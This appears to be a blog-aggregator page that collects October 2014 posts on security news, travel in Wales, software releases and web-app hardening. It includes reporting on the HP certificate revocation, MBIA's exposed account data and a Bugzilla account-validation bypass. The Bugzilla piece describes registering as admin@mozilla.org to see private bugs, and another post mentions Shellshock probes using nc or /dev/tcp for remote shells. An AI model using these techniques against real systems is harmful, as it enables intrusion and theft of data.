But according to HP’s Global Chief Information Security Officer Brett Wahlin, nothing quite so sexy or dramatic was involved in HP’s decision to revoke this particular certificate. Wahlin said HP was recently alerted by Symantec about a curious, four-year-old trojan horse program that appeared to have been signed with one of HP’s private certificates and found on a server outside of HP’s network. Further investigation traced the problem back to a malware infection on an HP developer’s computer.

HP investigators believe the trojan on the developer’s PC renamed itself to mimic one of the file names the company typically uses in its software testing, and that the malicious file was inadvertently included in a software package that was later signed with the company’s digital certificate. The company believes the malware got off of HP’s internal network because it contained a mechanism designed to transfer a copy of the file back to its point of origin.



Wahlin stressed that the software package in question was never included in software that was shipped to customers or put into production. Further, he said, there is no evidence that any of HP’s private certs were stolen.

“When people hear this, many will automatically assume we had some sort of compromise within our code signing infrastructure, and that is not the case,” he said. “We can show that we’ve never had a breach on our [certificate authority] and that our code-signing infrastructure is 100 percent intact.”

Even if the security concerns from this incident are minimal, the revocation of this certificate is likely to create support issues for some customers. The certificate in question expired several years ago, and so it cannot be used to digitally sign new files. But according to HP, it was used to sign a huge swath of HP software — including crucial hardware and software drivers, and other components that interact in fundamental ways with the Microsoft Windows operating system.

Thus, revoking the certificate means that HP must re-sign software that is already in use. Wahlin said most customers impacted by this change will merely encounter warnings from Windows if they try to reinstall certain drivers from original installation media, for example. But a key unknown at this point is how this move will affect HP computers that have built-in “recovery partitions” — small sections at the beginning of the computer’s hard drive that can be used to restore the system to its original, factory-shipped software configuration.

“The interesting thing that pops up here — and even Microsoft doesn’t know the answer to this — is what happens to systems with the restore partition, if they need to be restored,” Wahlin said. “Our PC group is working through trying to create solutions to help customers if that actually becomes a real-world scenario, but in the end that’s something we can’t test in a lab environment until that certificate is officially revoked by Verisign on October 21.”


A Day by the Sea My Universe | 2014-10-09 17:49 UTC

Having grown up by the sea, I naturally can't last long without salt in the air. Especially not when the sea is this close! So yesterday I headed to Barry on the Bristol Channel. It poured the whole drive, but the moment I could see the sea the clouds parted and the town greeted me with a beautiful rainbow, which, for lack of a parking space, I sadly couldn't photograph.

According to my tourist road map there were supposed to be a few historic sites there, but since the town council had gone to the trouble of advertising "Barry Island" and its attractions quite a few kilome... er, miles before the town, I changed my plans on the spot and followed the well-signposted route to the "island", which is really just two peninsulas (but two halves are ...?). The huge tourist car park was of course completely empty, so I parked my car not there but right by the beach. Holidaying off-season has its advantages.

Getting out of the car, I immediately noticed that while the rain had stopped, a proper storm had picked up. Perfect weather, then. It quickly became clear that the tide was going out: plenty of "beach", mussel-covered rocks lying dry, and waves that, despite the strong wind, practically "stood in place" are fairly clear signs.

One bay further on lay the old harbour of Barry: in the middle of the basin four small to very small boats, of which at most two still looked seaworthy, all of them sitting in mud between tough grasses. No water anywhere in the harbour. And the harbour entrance did not offer much hope in that regard either, given the large hill of beach sand that had evidently washed up there over the years.

As another shower was rolling in, I quickly fled into a restaurant for a rather meagre (and hopelessly overpriced) "Cajun chicken" salad. Elsewhere that would pass as a starter, yet it cost a full 6 pounds. I'd rather cook myself something proper in the evening! At least the sun came out again after the meal, so I went into Barry's town centre, where, by the way, you can park for free in the multi-storey car park right next to the pedestrian zone. There isn't really much to see there apart from the town hall and the harbour master's office at the new harbour. But all in all it is a nice, typically British-looking town with many streets full of nearly identical terraced houses. Yes, it really does look just the way it always does on television!

After a leisurely stroll the sun was already quite low, and I thought that in this light the shipwrecks in the old harbour would surely make for nice pictures, so I went back. To my surprise I could see from afar that storm and tide had already pushed the water up to the crest of the sandbank at the harbour entrance. It was only a matter of time before the basin would fill with water! So, in the loveliest weather, I spent the next half hour (or so) in the light of the setting sun watching its forces work together with those of the moon and the wind.

Today, unfortunately, the weather was truly nasty. "Nasty" as in "sneaky, mean": again and again the sun peeked through the clouds for a few moments, but no sooner did you have your jacket in hand and your shoes on than it was gone again. As soon as you set foot outside the door it started pouring like there was no tomorrow. Once you were back in the dry, it promptly stopped. That is how I managed to get soaked three times despite having spent maybe 5 minutes outdoors in total so far (each time on the way to or from the car). But the forecast says tomorrow should be better; we'll see.

Until then,

André


As many of you know, my first book — Spam Nation — hits bookstore shelves on Nov. 18. I want to thank those of you who have already pre-ordered the book, and offer a small enticement for those who have yet to secure a copy.

Pre-order two or more copies of Spam Nation and get this “Krebs Edition” branded ZeusGard.
Spam Nation is a true story about organized cybercriminals, some of whom are actively involved in using malware-laced spam to empty bank accounts belonging to small- and medium-sized businesses in the United States and Europe. I’ve written extensively about organizations that have lost tens of millions of dollars from these cyberheists. I’ve also encouraged online banking customers to take advantage of various “Live CD” technologies that allow users to sidestep the very malware that powers these cyberheists.

In July, I wrote about ZeusGard, one such technology that’s designed to streamline the process of adopting the Live CD approach for online banking. The makers of ZeusGard got such a positive response from that story that they offered to partner with Yours Truly in promoting Spam Nation!

I’m pleased to report that the first 1,000 customers to purchase two or more copies of Spam Nation — including any combination of digital, physical and/or audio versions of the book — before the official book launch on Nov. 18 will receive a complimentary KrebsOnSecurity-branded version of ZeusGard (pictured above)!

If you already pre-ordered two copies of the book, print, digital and/or audio, and have submitted the proof-of-purchase to spamnation@sourcebookspr.com, you will automatically receive a ZeusGard and do not need to resend that proof-of-purchase. If you’ve already pre-ordered a copy and wish to acquire another (print, digital or audio copy), please make sure to send that extra proof-of-purchase to spamnation@sourcebookspr.com. Pre-order your copy via several prominent booksellers, including Amazon, Barnes & Noble, Politics & Prose, and Powell’s.

So far, we have just 19 buyers who’ve chosen to purchase two or more copies, so we’ve got plenty more to go. I’ll put up another post if we get close to making the 1,000 customer limit.

Pre-orders are a big deal in the publishing industry because they signal to book sellers that a book is generating buzz and demand. They’re also important because they count toward the first week of sales, which can determine whether a book lands on best-seller lists.

So far, the reviews are very positive. Kirkus Reviews found the book “an eye-opening, immensely distressing exposé on the current state of organized cyberspammers.” Publisher’s Weekly calls Spam Nation “timely, informative, and sadly relevant in our cyber-dependent age.”

The Spam Nation book tour will kick off on Nov. 20 in Chicago, the hometown of my publisher — Sourcebooks. From there, we’ll be stopping in several other cities, including San Francisco, Seattle and Austin. In early December, I’ll be signing copies of Spam Nation at bookstores in New York and Washington, D.C. Please see the full schedule for more details, and join me if you’re able!


Greetings from Wales My Universe | 2014-10-08 09:35 UTC

Hello from Wales!

I'm travelling again, this time in Wales. And since at this time of year postcards here are as hard to find as other tourists, I thought I'd let you share in what I experience here every day, in case the promised postcards don't work out.

The story so far ...

On Monday (the day before yesterday), despite an extremely delayed departure and a rather bumpy flight, I arrived at Heathrow shortly after 3pm. Quickly picked up the car, a VW Golf diesel whose only missing extra is cruise control, and off onto the M4 towards "SOUTH WALES". Shortly before Wales came a brief scare: the bridge over the River Severn, or rather its estuary into the Bristol Channel, is tolled. And I had no cash on me yet. On a quick decision I took the last exit to look for a cash machine ... which turned out to be a motorway interchange with the M48. So, the next exit ... unfortunately an interchange with the M5. New game, new luck? Well, the queue in the left lane at least looked promising. And only 30 minutes later I was at a service station.

Refreshed (do they really use so little salt in everything here?) and with a few notes of Monopoly money ... er ... pounds sterling in my pocket, it was back onto the motorway. At least all the traffic jams reported on the radio earlier had disappeared in the meantime. The bridge itself: quite an experience! A pity that I couldn't find a lay-by for taking photos either before or after it (let alone "somewhere on the bridge"). I'll definitely try to make up for that when I get the chance!

Around half past seven I finally arrived at my destination: Taff's Well, north of Cardiff. A great place to stay and friendly hosts, although "Railway Cottage" turned out to be much more literal than I had originally thought: while the bedroom faces the village road (which unfortunately is fairly busy during the day), the Cardiff-Pontypridd train passes practically right in front of the living room (about 10 metres away) every 10 minutes. At least it's quiet at night, which also means you can't get out of Cardiff by train after 11pm.

On Tuesday morning I slept in and then, around 11am, woke Elisa, who is currently studying in Cardiff and lives in the neighbouring village. After an extended "Welsh Breakfast" she had to go to university, and I set out to explore the area a little. My plan was actually to drive cross-country (avoiding the countless motorways here) to Coch Castle. Somehow I ended up on the M4 west of Cardiff ... so motorway after all; back towards Taff's Well, then, and I followed the signs to the castle. Not that hard, actually, at least at first. But suddenly (the castle already far behind me) no more signs. Instead, narrow mountain roads and plenty of optimistic, if always very friendly, local drivers. Then suddenly signs again, but, as it turned out, to Caerphilly Castle. Fine by me. I even found the car park there straight away, and despite misleading signage also the footpath to the castle. A marvellous building that I absolutely have to see from the inside some time! Because of the late hour, there was only time for a walk around the outside this time. And since I had to pass Coch Castle on the way back to my lodgings anyway, I made a second attempt, and even found, by chance, the walkers' car park from which you can continue to the castle on foot! Well, that too will have to wait for another day.

In the evening, a small trip to Cardiff, actually with the aim of meeting Elisa and a few of her fellow students. The latter didn't show up, though, so we found ourselves a pub, caught up with each other, and made plans for the next few days. The way back ... well, a small odyssey across Cardiff's countless expressways ... After I had left the roundabout one exit too early about ten times (each time while trying to turn around), Elisa took over reading the TomTom, and lo and behold ...

That's it so far; today I want to head for the water. And given the density of castles here, there is bound to be a castle to visit there too.

See you tomorrow!

André


py3status v1.6 Ultrabug | 2014-10-08 09:01 UTC

Back from holidays, this new version of py3status was long overdue, as it features a lot of great contributions!

This version is dedicated to the amazing @ShadowPrince, who contributed 6 new modules.

Changelog

  • core: rename the ‘examples’ folder to ‘modules’
  • core: fix include_paths default wrt issue #38, by Frank Haun
  • new vnstat module, by Vasiliy Horbachenko
  • new net_rate module, alternative module for tracking network rate, by Vasiliy Horbachenko
  • new scratchpad-counter module and window-title module for displaying the current window’s title, by Vasiliy Horbachenko
  • new keyboard-layout module, by Vasiliy Horbachenko
  • new mpd_status module, by Vasiliy Horbachenko
  • new clementine module displaying the current “artist – title” playing in Clementine, by François LASSERRE
  • module clementine.py: Make python3 compatible, by Frank Haun
  • add optional CPU temperature to the sysdata module, by Rayeshman

Contributors

Huge thanks to this release’s contributors:

  • @ChoiZ
  • @fhaun
  • @rayeshman
  • @ShadowPrince

What’s next?

The next 1.7 release of py3status will bring a neat and cool feature which I’m sure you’ll love. Stay tuned!


On Monday, KrebsOnSecurity notified MBIA Inc. — the nation’s largest bond insurer — that a misconfiguration in a company Web server had exposed countless customer account numbers, balances and other sensitive data. Much of the information had been indexed by search engines, including a page listing administrative credentials that attackers could use to access data that wasn’t already accessible via a simple Web search.

A redacted screenshot of MBIA account information exposed to search engines.
MBIA Inc., based in Purchase, N.Y., is a public holding company that offers municipal bond insurance and investment management products. According to the firm’s Wikipedia page, MBIA, formerly known as the Municipal Bond Insurance Association, was formed in 1973 to diversify the holdings of several insurance companies, including Aetna, Fireman’s Fund, Travelers, Cigna and Continental.

Notified about the breach, the company quickly disabled the vulnerable site — mbiaweb.com. This Web property contained customer data from Cutwater Asset Management, a fixed-income unit of MBIA that is slated to be acquired by BNY Mellon Corp.

“We have been notified that certain information related to clients of MBIA’s asset management subsidiary, Cutwater Asset Management, may have been illegally accessed,” said MBIA spokesman Kevin Brown. “We are conducting a thorough investigation and will take all measures necessary to protect our customers’ data, secure our systems, and preserve evidence for law enforcement.”

Brown said MBIA notified all current customers about the incident Monday evening, and that it planned to notify former customers today.

Some 230 pages of account statements from Cutwater had been indexed by Google, including account and routing numbers, balances, dividends and account holder names for the Texas CLASS (a local government investment pool); the Louisiana Asset Management Pool; the New Hampshire Public Deposit Investment Pool; Connecticut CLASS Plus; and the Town of Richmond, NH.

In some cases, the documents indexed by search engines featured detailed instructions on how to authorize new bank accounts for deposits, including the forms and fax numbers needed to submit the account information.

Bryan Seely, an independent security expert with Seely Security, discovered the exposed data using a search engine. Seely said the data was exposed thanks to a poorly configured Oracle Reports database server. Normally, Seely said, this type of database server is configured to serve information only to authorized users who are accessing the data from within a trusted, private network — and certainly not open to the Web.



Worse yet, Seely noted, that misconfiguration also exposed an Oracle reports diagnostics page that included the username and password that would grant access to nearly all of the customer account data on the server.

“Malicious hackers finding dozens of universities or companies with Social Security numbers, health data or other information is devastating, but stumbling on bank accounts and the instructions for how to empty them is potentially catastrophic,” Seely said. “Billions in taxpayer funds, invested into one of the largest institutions in the world that were essentially being guarded by a sleeping security guard. What happens to those states when the money disappears?”

A misconfigured Oracle reports server can expose massive troves of sensitive data, a fact documented time and again by another independent researcher — Dana Taylor of NI @root. If your organization depends on Oracle Reports Services, please ensure that your administrators have read and implemented Oracle’s advice on securing these systems.

The accidental disclosure of customer data from MBIA comes amid revelations that foreign hackers — possibly organized crime groups operating out of Russia — hacked into networks of JPMorgan Chase. In public filings last week, JPMorgan said the breach exposed names, addresses, email addresses and phone numbers for 76 million household accounts and seven million small businesses. However, JPMorgan said that it has no indication that account numbers were exposed in the break-in.

Update, 3:03 p.m. ET: Updated the first and second paragraphs to clarify that the Municipal Bond Insurance Association is a former name for MBIA Inc.


The free software community was recently shaken by two security bugs called Heartbleed and Shellshock. While technically these bugs were quite different, I think they still share a lot.

Heartbleed hit the news in April this year: a bug in OpenSSL that allowed attackers to extract the private keys of encrypted connections. When a bug in Bash called Shellshock hit the news, I was at first hesitant to call it bigger than Heartbleed. But now I am pretty sure it is. While Heartbleed was big, there were some things that alleviated the impact. It took some days until people found out how to practically extract private keys - and even then it wasn't fast. And the most likely attack scenario - stealing a private key and pulling off a man-in-the-middle attack - seemed like something that would still pose some difficulties to an attacker. It seemed that people who update their systems quickly (like me) weren't in any real danger.

Shellshock was different. It's astonishingly simple to use and real attacks started hours after it became public. If circumstances had been unfortunate there would've been a very real chance that my own servers could've been hit by it. I usually feel the IT stuff under my responsibility is pretty safe, so things like this scare me.

What OpenSSL and Bash have in common

Shortly after Heartbleed something became very obvious: the OpenSSL project wasn't in good shape. The software that pretty much everyone on the Internet uses to do encryption was run by a small number of underpaid people. People trying to contribute and submit patches were often ignored (I know; I tried). The truth about Bash looks even grimmer: it's a project mostly run by a single volunteer. And yet almost every large Internet company out there uses it. Apple installs it on every laptop. OpenSSL and Bash are crucial pieces of software and run on the majority of the servers that run the Internet. Yet they are very small projects backed by few people. Both are also quite old: you'll find tons of legacy code in them, written more than a decade ago.

People like to rant about the code quality of software like OpenSSL and Bash. However, I am not that concerned about these two projects. This is the upside of events like these: OpenSSL is probably much more secure than it ever was, and after the dust settles Bash will be a better piece of software. If you want to ask yourself where the next Heartbleed/Shellshock-like bug will happen, ask this: What projects are there that are installed on almost every Linux system out there? And how many of them have a healthy community and received a good security audit lately?

Software installed on almost any Linux system

Let me propose a little experiment: Take your favorite Linux distribution, make a minimal installation without anything and look at what's installed. These are the software projects you should worry about. To make things easier I did this for you. I took my own system of choice, Gentoo Linux, but the results wouldn't be very different on other distributions. The results are at the bottom of this text. (I removed everything Gentoo-specific.) I admit this is oversimplifying things. Some of these provide more attack surface than others; we should probably worry more about the ones that are directly involved in providing network services.

After Heartbleed some people already asked questions like these. How could it happen that a project so essential to IT security is so underfunded? Some large companies acted, and the result is the Core Infrastructure Initiative by the Linux Foundation, which has already helped improve OpenSSL development. This is a great start, and an example of the kind of initiative we should have more of. We should ask the large IT companies who are not part of that initiative what they are doing to improve overall Internet security.

Just to put this into perspective: A thorough security audit of a project like Bash would probably cost a five-figure sum of dollars. For a small, volunteer-driven project this is huge. For a company like Apple - the one that installed Bash on all their laptops - it's nearly nothing.

There's another recent development I find noteworthy. Google started Project Zero where they hired some of the brightest minds in IT security and gave them a single job: Search for security bugs. Not in Google's own software. In every piece of software out there. This is not merely an altruistic project. It makes sense for Google. They want the web to be a safer place - because the web is where they earn their money. I like that approach a lot and I have only one question to ask about it: Why doesn't every large IT company have a Project Zero?

Sparking interest

There's another aspect I want to talk about. After Heartbleed people started having a closer look at OpenSSL and found a number of small issues and one other quite severe one. After Shellshock people instantly found more issues in Bash's function parser, and we now have six CVEs for Shellshock and friends. When a piece of software is affected by a severe security bug, people start to look for more. I wonder what it'd take to have people looking at the projects that aren't in the spotlight.

I was brainstorming whether we could have something like a "free software audit action day": a regular call where an important but neglected project is chosen and the security community is asked to have a look at it. This is just a vague idea for now; if you like it, please leave a comment.

That's it. I refrain from discussing whether bugs like Heartbleed or Shellshock disprove the "many eyes" principle that free software advocates like to cite, because I think these discussions are a pointless waste of time. I'd like to discuss how to improve things. Let's start.

Here's the promised list of Gentoo packages in the standard installation:

bzip2
gzip
tar
unzip
xz-utils
nano
ca-certificates
mime-types
pax-utils
bash
build-docbook-catalog
docbook-xml-dtd
docbook-xsl-stylesheets
openjade
opensp
po4a
sgml-common
perl
python
elfutils
expat
glib
gmp
libffi
libgcrypt
libgpg-error
libpcre
libpipeline
libxml2
libxslt
mpc
mpfr
openssl
popt
Locale-gettext
SGMLSpm
TermReadKey
Text-CharWidth
Text-WrapI18N
XML-Parser
gperf
gtk-doc-am
intltool
pkgconfig
iputils
netifrc
openssh
rsync
wget
acl
attr
baselayout
busybox
coreutils
debianutils
diffutils
file
findutils
gawk
grep
groff
help2man
hwids
kbd
kmod
less
man-db
man-pages
man-pages-posix
net-tools
sed
shadow
sysvinit
tcp-wrappers
texinfo
util-linux
which
pambase
autoconf
automake
binutils
bison
flex
gcc
gettext
gnuconfig
libtool
m4
make
patch
e2fsprogs
udev
linux-headers
cracklib
db
e2fsprogs-libs
gdbm
glibc
libcap
ncurses
pam
readline
timezone-data
zlib
procps
psmisc
shared-mime-info


For those of you on Edge who wish to test the new Linux emulation and the new AppCafe, Kris has posted the instructions:

CentOS 6.5 emulation has been made the default for the EDGE packages going out this weekend. This replaces the legacy f10 package set. I’ve tested / confirmed that Flash works properly, haven’t tried net-im/skype4 yet, but a package is available for those who want to try.

I’ve seen a few issues doing the update here with PKG. It seems often the conflict detection won’t remove f10 on its own, so I’ve had to do this:

# pkg update -f
# pkg delete linux_base-f10\*
# pkg install nvidia-driver (Skip this if you don’t use nvidia drivers)
# pkg install pcbsd-base
# pkg upgrade
# pc-extractoverlay ports
# reboot

After reboot, you need to recreate the flash plugin:

% flashpluginctl off && flashpluginctl on

Let us know any issues you see with the newer linux emulation layer.

Also, if you run into problems launching / navigating the newer AppCafe, please open bug reports asap. We are working to stabilize that as quickly as possible. Bug reports should be created at bugs.pcbsd.org.



A previously unknown security flaw in Bugzilla — a popular online bug-tracking tool used by Mozilla and many of the open source Linux distributions — allows anyone to view detailed reports about unfixed vulnerabilities in a broad swath of software. Bugzilla is expected today to issue a fix for this very serious weakness, which potentially exposes a veritable gold mine of vulnerabilities that would be highly prized by cyber criminals and nation-state actors.

The Bugzilla mascot.
Multiple software projects use Bugzilla to keep track of bugs and flaws that are reported by users. The Bugzilla platform allows anyone to create an account that can be used to report glitches or security issues in those projects. But as it turns out, that same reporting mechanism can be abused to reveal sensitive information about as-yet unfixed security holes in software packages that rely on Bugzilla.

A developer or security researcher who wants to report a flaw in Mozilla Firefox, for example, can sign up for an account at Mozilla’s Bugzilla platform. Bugzilla responds automatically by sending a validation email to the address specified in the signup request. But recently, researchers at security firm Check Point Software Technologies discovered that it was possible to create Bugzilla user accounts that bypass that validation process.

“Our exploit allows us to bypass that and register using any email we want, even if we don’t have access to it, because there is no validation that you actually control that domain,” said Shahar Tal, vulnerability research team leader for Check Point. “Because of the way permissions work on Bugzilla, we can get administrative privileges by simply registering using an address from one of the domains of the Bugzilla installation owner. For example, we registered as admin@mozilla.org, and suddenly we could see every private bug under Firefox and everything else under Mozilla.”



Bugzilla is expected today to release updates to remove the vulnerability and help further secure its core product. Update, 1:59 p.m. ET: An update that addresses this vulnerability and several others in Bugzilla is available here.

“An independent researcher has reported a vulnerability in Bugzilla which allows the manipulation of some database fields at the user creation procedure on Bugzilla, including the ‘login_name’ field,” said Sid Stamm, principal security and privacy engineer at Mozilla, which developed the tool and has licensed it for use under the Mozilla public license.

“This flaw allows an attacker to bypass email verification when they create an account, which may allow that account holder to assume some privileges, depending on how a particular Bugzilla instance is managed,” Stamm said. “There have been no reports from users that sensitive data has been compromised and we have no other reason to believe the vulnerability has been exploited. We expect the fixes to be released on Monday.”

The flaw is the latest in a string of critical and long-lived vulnerabilities to surface in the past year — including Heartbleed and Shellshock — that would be ripe for exploitation by nation state adversaries searching for secret ways to access huge volumes of sensitive data.

“The fact is that this was there for 10 years and no one saw it until now,” said Tal. “If nation state adversaries [had] access to private bug data, they would have a ball with this. There is no way to find out if anyone did exploit this other than going through user list and seeing if you have a suspicious user there.”

Like Heartbleed, this flaw was present in open source software to which countless developers and security experts had direct access for years on end.

“The perception that many eyes have looked at open source code and it’s secure because so many people have looked at it, I think this is false,” Tal said. “Because no one really audits code unless they’re committed to it or they’re paid to do it. This is why we can see such foolish bugs in very popular code.”

Update, Oct. 7, 12:44 p.m. ET: Mozilla issued the following statement in response to this story:

Regarding the comment in the first paragraph: While it’s a theoretical possibility that other Bugzilla installations expose security bugs to “all employees,” Mozilla does not do this and as a result our security bugs were not available to potential exploiters of this flaw.
At no time did Check Point get “administrative privileges” on bugzilla.mozilla.org. They did create an account called admin@mozilla.org that would inherit “netscapeconfidential” privileges, but we stopped using this privilege level long before the reported vulnerability was introduced.  They also created “admin@mozilla.com” which inherited “mozilla-employee” access. We do actively use that classification, but not for security bugs.
In addition, on bugzilla.mozilla.org Mozilla regularly checks @mozilla.com addresses against the employee database and would have caught any fraudulently created @mozilla.com accounts quickly.


In this post, I’m using bind98-9.8.8 from ports on FreeBSD 9.3, in case that helps you. Today, I was adjusting the pgcon.org domain as part of the move from the old server to the new server. This move would also see the website updated to PGCon 2015 and the use of Ansible for configuring that [...]


gelt Dan Langille's Other Diary | 2014-10-04 13:16 UTC

For future reference. This server formed the backbone of just about everything I did. It hosted about 13 domains. Sadly, it was i386 and would not do for ZFS. Copyright (c) 1992-2014 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All [...]


The first RC build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.


It has been four months since my last major build and release of Lilblue Linux, a pet project of mine [1].  The name is a bit pretentious, I admit, since Lilblue is not some other Linux distro.  It is Gentoo, but Gentoo with a twist.  It’s a fully featured amd64, hardened, XFCE4 desktop that uses uClibc instead of glibc as its standard C library.  I use it on some of my workstations at the College and at home, like any other desktop, and I know other people who use it too, but the main reason for its existence is that I wanted to push uClibc to its limits and see where things break.  Back in 2011, I got bored of working with the usual set of embedded packages.  So, while my students were writing their exams in Modern OS, I entertained myself just adding more and more packages to a stage3-amd64-hardened system [2] until I had a decent desktop.  After playing with it on and off, I finally polished it to the point where I thought others might enjoy it too and started pushing out releases.  Recently, I found out that the folks behind uselessd [3] used Lilblue as their testing ground. uselessd is another response to systemd [4], something like eudev [5], which I maintain, so the irony here is too much not to mention!  But that’s another story …

There was only one interesting issue about this release.  Generally I try to keep all releases about the same.  I’m not constantly updating the list of packages in @world.  I did remove pulseaudio this time around because it never did work right and I don’t use it.  I’ll fix it in the future, but not yet!  Instead, I concentrated on a much more interesting problem with a new release of e2fsprogs [6].   The problem started when upstream’s commit 58229aaf removed a broken fallback syscall for fallocate64() on systems where the latter is unavailable [7].  There was nothing wrong with this commit; in fact, it was the correct thing to do.  e4defrag.c used to have the following code:

#ifndef HAVE_FALLOCATE64
#warning Using locally defined fallocate syscall interface.

#ifndef __NR_fallocate
#error Your kernel headers don't define __NR_fallocate
#endif

/*
 * fallocate64() - Manipulate file space.
 *
 * @fd: defrag target file's descriptor.
 * @mode: process flag.
 * @offset: file offset.
 * @len: file size.
 */
static int fallocate64(int fd, int mode, loff_t offset, loff_t len)
{
    return syscall(__NR_fallocate, fd, mode, offset, len);
}
#endif /* ! HAVE_FALLOCATE64 */

The idea was that, if a configure test for fallocate64() failed because it isn’t available in your libc, but there is a system call for it in the kernel, then e4defrag would just make the syscall via your libc’s indirect syscall() function.  Seems simple enough, except that how system calls are dispatched is architecture- and ABI-dependent, and the above is broken on 32-bit systems [8].  Of course, uClibc didn’t have fallocate(), so e4defrag failed to build after that commit.  To my surprise, musl does have fallocate(), so this wasn’t a problem there, even though it is a Linux-specific function and not in any standard.

My first approach was to patch e2fsprogs to use posix_fallocate(), which is supposed to be equivalent to fallocate() when invoked with mode = 0.  e4defrag calls fallocate() with mode = 0, so this seemed like a simple fix.  However, this was not acceptable to Ts’o, since he was worried that some libc might implement posix_fallocate() by brute-force writing 0s.  That could be horribly slow for large allocations!  This wasn’t the case for uClibc’s implementation, but that didn’t seem to make much difference upstream.  Meh.

Rather than fight e2fsprogs, I sat down and hacked fallocate() into uClibc.  Since both fallocate() and posix_fallocate(), and their LFS counterparts fallocate64() and posix_fallocate64(), make the same syscall, it was sufficient to isolate that in an internal function which both could make use of.  That, plus a test suite, and Bernhard was kind enough to commit it to master [10].  Then a couple of backports, and uClibc’s 0.9.33 branch now has the fix as well.  Because there hasn’t been a release of uClibc in about two years, I’m using the 0.9.33 branch HEAD for Lilblue, so the problem there was solved.  I know it’s a little problematic, but it was either that or try to juggle dozens of patches.

The only thing that remains is to backport those fixes to the patchset vapier maintains for the uClibc ebuilds.  Since my uClibc stage3s don’t use the 0.9.33 branch HEAD, but the stable-tree ebuilds, which use the vanilla 0.9.33.2 release plus Mike’s patchset, upgrading e2fsprogs is blocked for those stages.

This whole process may seem like a real PITA, but this is exactly the sort of issue I like uncovering and cleaning up.  So far, the feedback on the latest release is good.  If you want to play with Lilblue and you don’t have a free box, fire up VirtualBox or your emulator of choice and give it a try.  You can download it from the experimental/amd64/uclibc directory of any mirror [11].



One of the interesting things I noticed after Shellshock was the number of probes for the vulnerability that counted on webapp users having direct network access. Not only pings to known addresses just to verify the vulnerability, or wget or curl with unique IDs, but even very rough nc or /dev/tcp connections to open remote shells. The fact that the probes are out there makes it logical to expect that, for at least some systems, they actually worked.

The reason this piqued my interest is that I realized most people don't take the one obvious step to mitigate this kind of problem: removing (or at least limiting) their web apps' access to the network. So I decided it might be worth taking a moment to describe why you should think about that. This is in part because I found out last year at LISA that not all sysadmins have enough training in development to immediately pick up how things work, and in part because I know that even if you're a programmer it might be counterintuitive to think that web apps should not have access, well, to the web.

Indeed, if you think of your app in the abstract, it has to have access to the network to serve responses to users, right? But what happens generally is that there is some division between the web server and the app itself. People who looked into Java in the early noughties have probably heard the term Application Server, usually present in the form of Apache Tomcat or IBM WebSphere, but essentially the same "actor" exists for Rails apps in the form of Passenger, or for PHP with the php-fpm service. These "servers" are effectively self-contained environments for your app that talk to the web server to receive user requests and serve back responses. This essentially means that, in the basic web interaction, no network access is needed by the application service.

Things get a bit more complicated in the Web 2.0 era, though: OAuth2 requires your web app to talk, from the backend, with the authentication or data providers. Similarly, even my blog needs to talk with some services: to ping them when a new post is out, and to check blog comments against Akismet for spam. WordPress plugins that create thumbnails are known to exist (and to have a bad security history), and they fetch external content, such as videos from YouTube and Vimeo, or images from Flickr and other hosting websites, to process. So there is a good amount of network connectivity needed by web apps too. Which means that rather than just isolating apps from the network, what you need to implement is some sort of filter.

Now, there are plenty of ways to remove network access from your webapp: SELinux, grsecurity RBAC, AppArmor, … but if you don't want to set up a complex security system, you can do the trick even with the bare minimum of the Linux kernel, iptables and CONFIG_NETFILTER_XT_MATCH_OWNER. Essentially, what this allows you to do is to match (and thus filter) connections based on the originating (or destination) user. This of course only works if you can isolate your webapps under separate users, which is definitely what you should do, but not necessarily what people are doing. Especially with things like mod_perl or mod_php, separating webapps into users is difficult (they run in-process with the webserver, which negates the split with the application server), but at least php-fpm and Passenger allow for that quite easily. Running as separate users, by the way, has many more advantages than just network filtering, so start doing that now, no matter what.

Now, depending on what webapp you have in front of you, there are different ways to achieve a near-perfect setup. In my case I have a few different applications running across my servers: my blog, a WordPress blog of a customer, phpMyAdmin for that database, and finally a webapp for an old customer which is essentially an ERP. These have different requirements, so I'll start with the one that has the lowest.

The ERP app was designed to be as simple as possible: it's a basic Rails app that uses PostgreSQL to store data. Authentication is done by Apache via HTTP Basic Auth over HTTPS (no plaintext), so there is no OAuth2 or other backend interaction. The only expected connection is to the PostgreSQL server. The requirements for phpMyAdmin are pretty similar: it only has to interface with Apache and with the MySQL service it administers, and authentication is also done on the HTTP side (also encrypted). For both these apps, the network policy is quite obvious: deny any outside connectivity. This becomes a matter of iptables -A OUTPUT -o eth0 -m owner --uid-owner phpmyadmin -j REJECT, and the same for the other user.

The situation for the other two apps is a bit more complex: my blog wants to at least announce that there are new blog posts, and it needs to reach Akismet; both actions use HTTP and HTTPS. WordPress is a bit more complex because I don't have much control over it (it has a dedicated server, so I don't have to care), but I assume it is also mostly HTTP and HTTPS. The obvious idea would be to allow ports 80, 443 and 53 (for resolution). But you can do something better: you can put a proxy on localhost and force the webapp to go through it, either as a transparent proxy or by using the http_proxy environment variable to convince the webapp to never connect directly to the web. Unfortunately that is not straightforward to implement, as neither Passenger nor php-fpm has a clean way to pass environment variables per user.
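The proxy-only policy can be enforced with the same owner match. This is a sketch under stated assumptions: the blog runs as a user named blog, the proxy listens on 127.0.0.1:3128, and the proxy itself runs as a different user so its own outbound traffic is unaffected:

```shell
# The blog user may talk only to the local proxy; everything else is refused,
# so all HTTP(S) has to go through the proxy and direct connections fail.
iptables -A OUTPUT -o lo -p tcp --dport 3128 -m owner --uid-owner blog -j ACCEPT
iptables -A OUTPUT -o eth0 -m owner --uid-owner blog -j REJECT
```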

What I've done for now is to hack the environment.rb file to set ENV['http_proxy'] = 'http://127.0.0.1:3128/' so that Ruby will at least respect it. I'm still looking for a solution for PHP, unfortunately. In the case of Typo, this actually showed me two things I did not know: when looking at the admin dashboard, it makes two main HTTP calls: one to Google Blog Search – which was shut down back in May – and one to Typo's version file — which is now a 404 page since the move to the Publify name. I'll soon be shutting down both calls since I really don't need them. Indeed, Publify development still seems to go toward "let's add all possible new features that other blogging sites have" without considering the actual scalability of the platform. I don't expect to go back to it any time soon.


